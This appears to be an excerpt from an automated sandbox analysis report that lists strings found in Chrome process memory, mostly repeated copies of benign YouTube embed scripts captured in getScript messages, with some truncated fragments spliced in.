Source: chrome.exe, 00000000.00000002.2501891473.000028EC06D1C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmp String found in binary or memory: {"action":"getScript","source":"if ('undefined' == typeof Symbol || 'undefined' == typeof Symbol.iterator) {delete Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmp String found in binary or memory: {"action":"getScript","source":"if ('undefined' == typeof Symbol || 'undefined' == typeof Symbol.iterator) {delete Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false}CuE23jf8bkHaX equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2497133078.000028EC04B64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: {"action":"getScript","source":"if ('undefined' == typeof Symbol || 'undefined' == typeof Symbol.iterator) {delete Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmp String found in binary or memory: {"action":"getScript","source":"if (document.fonts && document.fonts.load) {document.fonts.load(\"400 10pt Roboto\", \"E\"); document.fonts.load(\"500 10pt Roboto\", \"E\");}","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF68D000.00000004.08000000.00040000.00000007.sdmp, chrome.exe, 00000000.00000003.2393532398.000028EC063EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2341110796.000028EC06320000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: {"action":"getScript","source":"var ytcsi={gt:function(n){n=(n||\"\")+\"data_\";return ytcsi[n]||(ytcsi[n]={tick:{},info:{},gel:{preLoggedGelInfos:[]}})},now:window.performance&&window.performance.timing&&window.performance.now&&window.performance.timing.navigationStart?function(){return window.performance.timing.navigationStart+window.performance.now()}:function(){return(new Date).getTime()},tick:function(l,t,n){var ticks=ytcsi.gt(n).tick;var v=t||ytcsi.now();if(ticks[l]){ticks[\"_\"+l]=ticks[\"_\"+l]||[ticks[l]];ticks[\"_\"+l].push(v)}ticks[l]=\nv},info:function(k,v,n){ytcsi.gt(n).info[k]=v},infoGel:function(p,n){ytcsi.gt(n).gel.preLoggedGelInfos.push(p)},setStart:function(t,n){ytcsi.tick(\"_start\",t,n)}};\n(function(w,d){function isGecko(){if(!w.navigator)return false;try{if(w.navigator.userAgentData&&w.navigator.userAgentData.brands&&w.navigator.userAgentData.brands.length){var brands=w.navigator.userAgentData.brands;var i=0;for(;i<brands.length;i++)if(brands[i]&&brands[i].brand===\"Firefox\")return true;return false}}catch(e){setTimeout(function(){throw e;})}if(!w.navigator.userAgent)return false;var ua=w.navigator.userAgent;return ua.indexOf(\"Gecko\")>0&&ua.toLowerCase().indexOf(\"webkit\")<0&&ua.indexOf(\"Edge\")<\n0&&ua.indexOf(\"Trident\")<0&&ua.indexOf(\"MSIE\")<0}ytcsi.setStart(w.performance?w.performance.timing.responseStart:null);var isPrerender=(d.visibilityState||d.webkitVisibilityState)==\"prerender\";var vName=!d.visibilityState&&d.webkitVisibilityState?\"webkitvisibilitychange\":\"visibilitychange\";if(isPrerender){var 
startTick=function(){ytcsi.setStart();d.removeEventListener(vName,startTick)};d.addEventListener(vName,startTick,false)}if(d.addEventListener)d.addEventListener(vName,function(){ytcsi.tick(\"vc\")},\nfalse);if(isGecko()){var isHidden=(d.visibilityState||d.webkitVisibilityState)==\"hidden\";if(isHidden)ytcsi.tick(\"vc\")}var slt=function(el,t){setTimeout(function(){var n=ytcsi.now();el.loadTime=n;if(el.slt)el.slt()},t)};w.__ytRIL=function(el){if(!el.getAttribute(\"data-thumb\"))if(w.requestAnimationFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2319886197.000028EC06310000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329678735.000028EC06310000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: {"action":"getScript","source":"var ytcsi={gt:function(n){n=(n||\"\")+\"data_\";return ytcsi[n]||(ytcsi[n]={tick:{},info:{},gel:{preLoggedGelInfos:[]}})},now:window.performance&&window.performance.timing&&window.performance.now&&window.performance.timing.navigationStart?function(){return window.performance.timing.navigationStart+window.performance.now()}:function(){return(new Date).getTime()},tick:function(l,t,n){var ticks=ytcsi.gt(n).tick;var v=t||ytcsi.now();if(ticks[l]){ticks[\"_\"+l]=ticks[\"_\"+l]||[ticks[l]];ticks[\"_\"+l].push(v)}ticks[l]=\nv},info:function(k,v,n){ytcsi.gt(n).info[k]=v},infoGel:function(p,n){ytcsi.gt(n).gel.preLoggedGelInfos.push(p)},setStart:function(t,n){ytcsi.tick(\"_start\",t,n)}};\n(function(w,d){function isGecko(){if(!w.navigator)return false;try{if(w.navigator.userAgentData&&w.navigator.userAgentData.brands&&w.navigator.userAgentData.brands.length){var brands=w.navigator.userAgentData.brands;var i=0;for(;i<brands.length;i++)if(brands[i]&&brands[i].brand===\"Firefox\")return true;return false}}catch(e){setTimeout(function(){throw e;})}if(!w.navigator.userAgent)return false;var ua=w.navigator.userAgent;return ua.indexOf(\"Gecko\")>0&&ua.toLowerCase().indexOf(\"webkit\")<0&&ua.indexOf(\"Edge\")<\n0&&ua.indexOf(\"Trident\")<0&&ua.indexOf(\"MSIE\")<0}ytcsi.setStart(w.performance?w.performance.timing.responseStart:null);var isPrerender=(d.visibilityState||d.webkitVisibilityState)==\"prerender\";var vName=!d.visibilityState&&d.webkitVisibilityState?\"webkitvisibilitychange\":\"visibilitychange\";if(isPrerender){var 
startTick=function(){ytcsi.setStart();d.removeEventListener(vName,startTick)};d.addEventListener(vName,startTick,false)}if(d.addEventListener)d.addEventListener(vName,function(){ytcsi.tick(\"vc\")},\nfalse);if(isGecko()){var isHidden=(d.visibilityState||d.webkitVisibilityState)==\"hidden\";if(isHidden)ytcsi.tick(\"vc\")}var slt=function(el,t){setTimeout(function(){var n=ytcsi.now();el.loadTime=n;if(el.slt)el.slt()},t)};w.__ytRIL=function(el){if(!el.getAttribute(\"data-thumb\"))if(w.requestAnimationFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2347774533.000028EC06454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2439355514.000001E4ACC1D000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000002.2480776157.000028EC03324000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: {"action":"getScript","source":"var ytcsi={gt:function(n){n=(n||\"\")+\"data_\";return ytcsi[n]||(ytcsi[n]={tick:{},info:{},gel:{preLoggedGelInfos:[]}})},now:window.performance&&window.performance.timing&&window.performance.now&&window.performance.timing.navigationStart?function(){return window.performance.timing.navigationStart+window.performance.now()}:function(){return(new Date).getTime()},tick:function(l,t,n){var ticks=ytcsi.gt(n).tick;var v=t||ytcsi.now();if(ticks[l]){ticks[\"_\"+l]=ticks[\"_\"+l]||[ticks[l]];ticks[\"_\"+l].push(v)}ticks[l]=\nv},info:function(k,v,n){ytcsi.gt(n).info[k]=v},infoGel:function(p,n){ytcsi.gt(n).gel.preLoggedGelInfos.push(p)},setStart:function(t,n){ytcsi.tick(\"_start\",t,n)}};\n(function(w,d){function isGecko(){if(!w.navigator)return false;try{if(w.navigator.userAgentData&&w.navigator.userAgentData.brands&&w.navigator.userAgentData.brands.length){var brands=w.navigator.userAgentData.brands;var i=0;for(;i<brands.length;i++)if(brands[i]&&brands[i].brand===\"Firefox\")return true;return false}}catch(e){setTimeout(function(){throw e;})}if(!w.navigator.userAgent)return false;var ua=w.navigator.userAgent;return ua.indexOf(\"Gecko\")>0&&ua.toLowerCase().indexOf(\"webkit\")<0&&ua.indexOf(\"Edge\")<\n0&&ua.indexOf(\"Trident\")<0&&ua.indexOf(\"MSIE\")<0}ytcsi.setStart(w.performance?w.performance.timing.responseStart:null);var isPrerender=(d.visibilityState||d.webkitVisibilityState)==\"prerender\";var vName=!d.visibilityState&&d.webkitVisibilityState?\"webkitvisibilitychange\":\"visibilitychange\";if(isPrerender){var 
startTick=function(){ytcsi.setStart();d.removeEventListener(vName,startTick)};d.addEventListener(vName,startTick,false)}if(d.addEventListener)d.addEventListener(vName,function(){ytcsi.tick(\"vc\")},\nfalse);if(isGecko()){var isHidden=(d.visibilityState||d.webkitVisibilityState)==\"hidden\";if(isHidden)ytcsi.tick(\"vc\")}var slt=function(el,t){setTimeout(function(){var n=ytcsi.now();el.loadTime=n;if(el.slt)el.slt()},t)};w.__ytRIL=function(el){if(!el.getAttribute(\"data-thumb\"))if(w.requestAnimationFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2439355514.000001E4ACC1D000.00000004.00000001.00040000.00000007.sdmp String found in binary or memory: {"action":"getScript","source":"var ytcsi={gt:function(n){n=(n||\"\")+\"data_\";return ytcsi[n]||(ytcsi[n]={tick:{},info:{},gel:{preLoggedGelInfos:[]}})},now:window.performance&&window.performance.timing&&window.performance.now&&window.performance.timing.navigationStart?function(){return window.performance.timing.navigationStart+window.performance.now()}:function(){return(new Date).getTime()},tick:function(l,t,n){var ticks=ytcsi.gt(n).tick;var v=t||ytcsi.now();if(ticks[l]){ticks[\"_\"+l]=ticks[\"_\"+l]||[ticks[l]];ticks[\"_\"+l].push(v)}ticks[l]=\nv},info:function(k,v,n){ytcsi.gt(n).info[k]=v},infoGel:function(p,n){ytcsi.gt(n).gel.preLoggedGelInfos.push(p)},setStart:function(t,n){ytcsi.tick(\"_start\",t,n)}};\n(function(w,d){function isGecko(){if(!w.navigator)return false;try{if(w.navigator.userAgentData&&w.navigator.userAgentData.brands&&w.navigator.userAgentData.brands.length){var brands=w.navigator.userAgentData.brands;var i=0;for(;i<brands.length;i++)if(brands[i]&&brands[i].brand===\"Firefox\")return true;return false}}catch(e){setTimeout(function(){throw e;})}if(!w.navigator.userAgent)return false;var ua=w.navigator.userAgent;return ua.indexOf(\"Gecko\")>0&&ua.toLowerCase().indexOf(\"webkit\")<0&&ua.indexOf(\"Edge\")<\n0&&ua.indexOf(\"Trident\")<0&&ua.indexOf(\"MSIE\")<0}ytcsi.setStart(w.performance?w.performance.timing.responseStart:null);var isPrerender=(d.visibilityState||d.webkitVisibilityState)==\"prerender\";var vName=!d.visibilityState&&d.webkitVisibilityState?\"webkitvisibilitychange\":\"visibilitychange\";if(isPrerender){var startTick=function(){ytcsi.setStart();d.removeEventListener(vName,startTick)};d.addEventListener(vName,startTick,false)}if(d.addEventListener)d.addEventListener(vName,function(){ytcsi.tick(\"vc\")},\nfalse);if(isGecko()){var 
isHidden=(d.visibilityState||d.webkitVisibilityState)==\"hidden\";if(isHidden)ytcsi.tick(\"vc\")}var slt=function(el,t){setTimeout(function(){var n=ytcsi.now();el.loadTime=n;if(el.slt)el.slt()},t)};w.__ytRIL=function(el){if(!el.getAttribute(\"data-thumb\"))if(w.requestAnimationFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false});\n document.querySelector('head').appendChild(style);\n\n if (userButtonMinWidth) {\n const userButtonStyle = document.createElement('style');\n userButtonStyle.textContent = `#toolbar-item-user {min-width: ` + userButtonMinWidth +`px;}`\n document.querySelector('head').appendChild(userButtonStyle);\n }\n }\n }\n document.querySelector('html').classList.add(...classesToAdd);\n})();","currentUrl":"https://fountainofhealth.ca/en","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2347774533.000028EC06454000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: {"action":"getScript","source":"var ytcsi={gt:function(n){n=(n||\"\")+\"data_\";return ytcsi[n]||(ytcsi[n]={tick:{},info:{},gel:{preLoggedGelInfos:[]}})},now:window.performance&&window.performance.timing&&window.performance.now&&window.performance.timing.navigationStart?function(){return window.performance.timing.navigationStart+window.performance.now()}:function(){return(new Date).getTime()},tick:function(l,t,n){var ticks=ytcsi.gt(n).tick;var v=t||ytcsi.now();if(ticks[l]){ticks[\"_\"+l]=ticks[\"_\"+l]||[ticks[l]];ticks[\"_\"+l].push(v)}ticks[l]=\nv},info:function(k,v,n){ytcsi.gt(n).info[k]=v},infoGel:function(p,n){ytcsi.gt(n).gel.preLoggedGelInfos.push(p)},setStart:function(t,n){ytcsi.tick(\"_start\",t,n)}};\n(function(w,d){function isGecko(){if(!w.navigator)return false;try{if(w.navigator.userAgentData&&w.navigator.userAgentData.brands&&w.navigator.userAgentData.brands.length){var brands=w.navigator.userAgentData.brands;var i=0;for(;i<brands.length;i++)if(brands[i]&&brands[i].brand===\"Firefox\")return true;return false}}catch(e){setTimeout(function(){throw e;})}if(!w.navigator.userAgent)return false;var ua=w.navigator.userAgent;return ua.indexOf(\"Gecko\")>0&&ua.toLowerCase().indexOf(\"webkit\")<0&&ua.indexOf(\"Edge\")<\n0&&ua.indexOf(\"Trident\")<0&&ua.indexOf(\"MSIE\")<0}ytcsi.setStart(w.performance?w.performance.timing.responseStart:null);var isPrerender=(d.visibilityState||d.webkitVisibilityState)==\"prerender\";var vName=!d.visibilityState&&d.webkitVisibilityState?\"webkitvisibilitychange\":\"visibilitychange\";if(isPrerender){var startTick=function(){ytcsi.setStart();d.removeEventListener(vName,startTick)};d.addEventListener(vName,startTick,false)}if(d.addEventListener)d.addEventListener(vName,function(){ytcsi.tick(\"vc\")},\nfalse);if(isGecko()){var 
isHidden=(d.visibilityState||d.webkitVisibilityState)==\"hidden\";if(isHidden)ytcsi.tick(\"vc\")}var slt=function(el,t){setTimeout(function(){var n=ytcsi.now();el.loadTime=n;if(el.slt)el.slt()},t)};w.__ytRIL=function(el){if(!el.getAttribute(\"data-thumb\"))if(w.requestAnimationFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false}1104 equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2480776157.000028EC03324000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: {"action":"getScript","source":"var ytcsi={gt:function(n){n=(n||\"\")+\"data_\";return ytcsi[n]||(ytcsi[n]={tick:{},info:{},gel:{preLoggedGelInfos:[]}})},now:window.performance&&window.performance.timing&&window.performance.now&&window.performance.timing.navigationStart?function(){return window.performance.timing.navigationStart+window.performance.now()}:function(){return(new Date).getTime()},tick:function(l,t,n){var ticks=ytcsi.gt(n).tick;var v=t||ytcsi.now();if(ticks[l]){ticks[\"_\"+l]=ticks[\"_\"+l]||[ticks[l]];ticks[\"_\"+l].push(v)}ticks[l]=\nv},info:function(k,v,n){ytcsi.gt(n).info[k]=v},infoGel:function(p,n){ytcsi.gt(n).gel.preLoggedGelInfos.push(p)},setStart:function(t,n){ytcsi.tick(\"_start\",t,n)}};\n(function(w,d){function isGecko(){if(!w.navigator)return false;try{if(w.navigator.userAgentData&&w.navigator.userAgentData.brands&&w.navigator.userAgentData.brands.length){var brands=w.navigator.userAgentData.brands;var i=0;for(;i<brands.length;i++)if(brands[i]&&brands[i].brand===\"Firefox\")return true;return false}}catch(e){setTimeout(function(){throw e;})}if(!w.navigator.userAgent)return false;var ua=w.navigator.userAgent;return ua.indexOf(\"Gecko\")>0&&ua.toLowerCase().indexOf(\"webkit\")<0&&ua.indexOf(\"Edge\")<\n0&&ua.indexOf(\"Trident\")<0&&ua.indexOf(\"MSIE\")<0}ytcsi.setStart(w.performance?w.performance.timing.responseStart:null);var isPrerender=(d.visibilityState||d.webkitVisibilityState)==\"prerender\";var vName=!d.visibilityState&&d.webkitVisibilityState?\"webkitvisibilitychange\":\"visibilitychange\";if(isPrerender){var startTick=function(){ytcsi.setStart();d.removeEventListener(vName,startTick)};d.addEventListener(vName,startTick,false)}if(d.addEventListener)d.addEventListener(vName,function(){ytcsi.tick(\"vc\")},\nfalse);if(isGecko()){var 
isHidden=(d.visibilityState||d.webkitVisibilityState)==\"hidden\";if(isHidden)ytcsi.tick(\"vc\")}var slt=function(el,t){setTimeout(function(){var n=ytcsi.now();el.loadTime=n;if(el.slt)el.slt()},t)};w.__ytRIL=function(el){if(!el.getAttribute(\"data-thumb\"))if(w.requestAnimationFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false}Q equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2492760471.000028EC0413C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmp, chrome.exe, 00000000.00000002.2485699742.000028EC0384C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: {"action":"getScript","source":"var yterr = yterr || true;","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2492760471.000028EC0413C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmp, chrome.exe, 00000000.00000002.2474598295.000028EC02B94000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: {"action":"getScript","source":"var yterr = yterr || true;","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmp String found in binary or memory: {"action":"getScript","source":"var yterr = yterr || true;","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false}` equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2490296198.000028EC03F64000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000002.2497133078.000028EC04B64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: {"action":"getScript","source":"var yterr = yterr || true;","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2360507496.000028EC07A88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmp String found in binary or memory: {"action":"getScript","source":"window.WIZ_global_data = {\"MUE6Ne\":\"youtube_web\",\"MuJWjd\":false,\"UUFaWc\":\"%.@.null,1000,2]\",\"cfb2h\":\"youtube.web-front-end-critical_20250520.08_p0\",\"fPDxwd\":[],\"iCzhFc\":false,\"nQyAE\":{},\"oxN3nb\":{\"1\":false,\"0\":false,\"610401301\":false,\"899588437\":false,\"725719775\":false,\"513659523\":false,\"568333945\":false,\"1331761403\":false,\"651175828\":false,\"722764542\":false,\"748402145\":false,\"748402146\":false,\"1981196515\":false,\"103340015\":false,\"555019702\":false},\"u4g7r\":\"%.@.null,1,2]\",\"vJQk6\":false,\"xnI9P\":true,\"xwAfE\":true,\"yFnxrf\":2486};","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmp String found in binary or memory: {"action":"getScript","source":"window.WIZ_global_data = {\"MUE6Ne\":\"youtube_web\",\"MuJWjd\":false,\"UUFaWc\":\"%.@.null,1000,2]\",\"cfb2h\":\"youtube.web-front-end-critical_20250520.08_p0\",\"fPDxwd\":[],\"iCzhFc\":false,\"nQyAE\":{},\"oxN3nb\":{\"1\":false,\"0\":false,\"610401301\":false,\"899588437\":false,\"725719775\":false,\"513659523\":false,\"568333945\":false,\"1331761403\":false,\"651175828\":false,\"722764542\":false,\"748402145\":false,\"748402146\":false,\"1981196515\":false,\"103340015\":false,\"555019702\":false},\"u4g7r\":\"%.@.null,1,2]\",\"vJQk6\":false,\"xnI9P\":true,\"xwAfE\":true,\"yFnxrf\":2486};","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false}[G],Z[(t=w+A,(t|0)-~(t&7)+~t)+(g&2)]=L,Z)[w+(2*(g|0)-(g|2)-(g^2)+2*(~g&2))]=-66,L},q=C),q}"},"sessionId":"26AC8CA9FC799C4CA68F0EFBB42866FD"} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2360507496.000028EC07A88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmp String found in binary or memory: {"action":"getScript","source":"window.WIZ_global_data = {\"MUE6Ne\":\"youtube_web\",\"MuJWjd\":false,\"UUFaWc\":\"%.@.null,1000,2]\",\"cfb2h\":\"youtube.web-front-end-critical_20250520.08_p0\",\"fPDxwd\":[],\"iCzhFc\":false,\"nQyAE\":{},\"oxN3nb\":{\"1\":false,\"0\":false,\"610401301\":false,\"899588437\":false,\"725719775\":false,\"513659523\":false,\"568333945\":false,\"1331761403\":false,\"651175828\":false,\"722764542\":false,\"748402145\":false,\"748402146\":false,\"1981196515\":false,\"103340015\":false,\"555019702\":false},\"u4g7r\":\"%.@.null,1,2]\",\"vJQk6\":false,\"xnI9P\":true,\"xwAfE\":true,\"yFnxrf\":2486};","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmp String found in binary or memory: {"action":"getScript","source":"window.WIZ_global_data = {\"MUE6Ne\":\"youtube_web\",\"MuJWjd\":false,\"UUFaWc\":\"%.@.null,1000,2]\",\"cfb2h\":\"youtube.web-front-end-critical_20250520.08_p0\",\"fPDxwd\":[],\"iCzhFc\":false,\"nQyAE\":{},\"oxN3nb\":{\"1\":false,\"0\":false,\"610401301\":false,\"899588437\":false,\"725719775\":false,\"513659523\":false,\"568333945\":false,\"1331761403\":false,\"651175828\":false,\"722764542\":false,\"748402145\":false,\"748402146\":false,\"1981196515\":false,\"103340015\":false,\"555019702\":false},\"u4g7r\":\"%.@.null,1,2]\",\"vJQk6\":false,\"xnI9P\":true,\"xwAfE\":true,\"yFnxrf\":2486};","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false}ce.js"},"sessionId":"26AC8CA9FC799C4CA68F0EFBB42866FD"} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000003.2352362951.000028EC0648C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: {"action":"getScript","source":"window.WIZ_global_data = {\"MUE6Ne\":\"youtube_web\",\"MuJWjd\":false,\"UUFaWc\":\"%.@.null,1000,2]\",\"cfb2h\":\"youtube.web-front-end-critical_20250520.08_p0\",\"fPDxwd\":[],\"iCzhFc\":false,\"nQyAE\":{},\"oxN3nb\":{\"1\":false,\"0\":false,\"610401301\":false,\"899588437\":false,\"725719775\":false,\"513659523\":false,\"568333945\":false,\"1331761403\":false,\"651175828\":false,\"722764542\":false,\"748402145\":false,\"748402146\":false,\"1981196515\":false,\"103340015\":false,\"555019702\":false},\"u4g7r\":\"%.@.null,1,2]\",\"vJQk6\":false,\"xnI9P\":true,\"xwAfE\":true,\"yFnxrf\":2486};","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmp String found in binary or memory: {"action":"getScript","source":"window.WIZ_global_data = {\"MUE6Ne\":\"youtube_web\",\"MuJWjd\":false,\"UUFaWc\":\"%.@.null,1000,2]\",\"cfb2h\":\"youtube.web-front-end-critical_20250520.08_p0\",\"fPDxwd\":[],\"iCzhFc\":false,\"nQyAE\":{},\"oxN3nb\":{\"1\":false,\"0\":false,\"610401301\":false,\"899588437\":false,\"725719775\":false,\"513659523\":false,\"568333945\":false,\"1331761403\":false,\"651175828\":false,\"722764542\":false,\"748402145\":false,\"748402146\":false,\"1981196515\":false,\"103340015\":false,\"555019702\":false},\"u4g7r\":\"%.@.null,1,2]\",\"vJQk6\":false,\"xnI9P\":true,\"xwAfE\":true,\"yFnxrf\":2486};","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false}eading .panel-title').removeClass('js-form-required form-required'); equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2500912249.000028EC06828000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2360620898.000028EC06828000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: {"action":"getScript","source":"window.yterr=window.yterr||true;window.unhandledErrorMessages={};\nwindow.onerror=function(msg,url,line,opt_columnNumber,opt_error){var err;if(opt_error)err=opt_error;else{err=new Error;err.message=msg;err.fileName=url;err.lineNumber=line;if(!isNaN(opt_columnNumber))err[\"columnNumber\"]=opt_columnNumber}var message=String(err.message);if(!err.message||message in window.unhandledErrorMessages)return;window.unhandledErrorMessages[message]=true;var img=new Image;window.emergencyTimeoutImg=img;img.onload=img.onerror=function(){delete window.emergencyTimeoutImg};var values=\n{\"client.name\":ytcfg.get(\"INNERTUBE_CONTEXT_CLIENT_NAME\"),\"client.version\":ytcfg.get(\"INNERTUBE_CONTEXT_CLIENT_VERSION\"),\"msg\":message,\"type\":\"UnhandledWindow\"+err.name,\"file\":err.fileName,\"line\":err.lineNumber,\"stack\":(err.stack||\"\").substr(0,500)};var parts=[ytcfg.get(\"EMERGENCY_BASE_URL\",\"/error_204?t=jserror&level=ERROR\")];var key;for(key in values){var value=values[key];if(value)parts.push(key+\"=\"+encodeURIComponent(value))}img.src=parts.join(\"&\")};\n","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2500912249.000028EC06828000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: {"action":"getScript","source":"window.yterr=window.yterr||true;window.unhandledErrorMessages={};\nwindow.onerror=function(msg,url,line,opt_columnNumber,opt_error){var err;if(opt_error)err=opt_error;else{err=new Error;err.message=msg;err.fileName=url;err.lineNumber=line;if(!isNaN(opt_columnNumber))err[\"columnNumber\"]=opt_columnNumber}var message=String(err.message);if(!err.message||message in window.unhandledErrorMessages)return;window.unhandledErrorMessages[message]=true;var img=new Image;window.emergencyTimeoutImg=img;img.onload=img.onerror=function(){delete window.emergencyTimeoutImg};var values=\n{\"client.name\":ytcfg.get(\"INNERTUBE_CONTEXT_CLIENT_NAME\"),\"client.version\":ytcfg.get(\"INNERTUBE_CONTEXT_CLIENT_VERSION\"),\"msg\":message,\"type\":\"UnhandledWindow\"+err.name,\"file\":err.fileName,\"line\":err.lineNumber,\"stack\":(err.stack||\"\").substr(0,500)};var parts=[ytcfg.get(\"EMERGENCY_BASE_URL\",\"/error_204?t=jserror&level=ERROR\")];var key;for(key in values){var value=values[key];if(value)parts.push(key+\"=\"+encodeURIComponent(value))}img.src=parts.join(\"&\")};\n","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false}P$4c943c22-5c79-4450-af80-a88a7cf5104bf5104b equals www.youtube.com (Youtube)
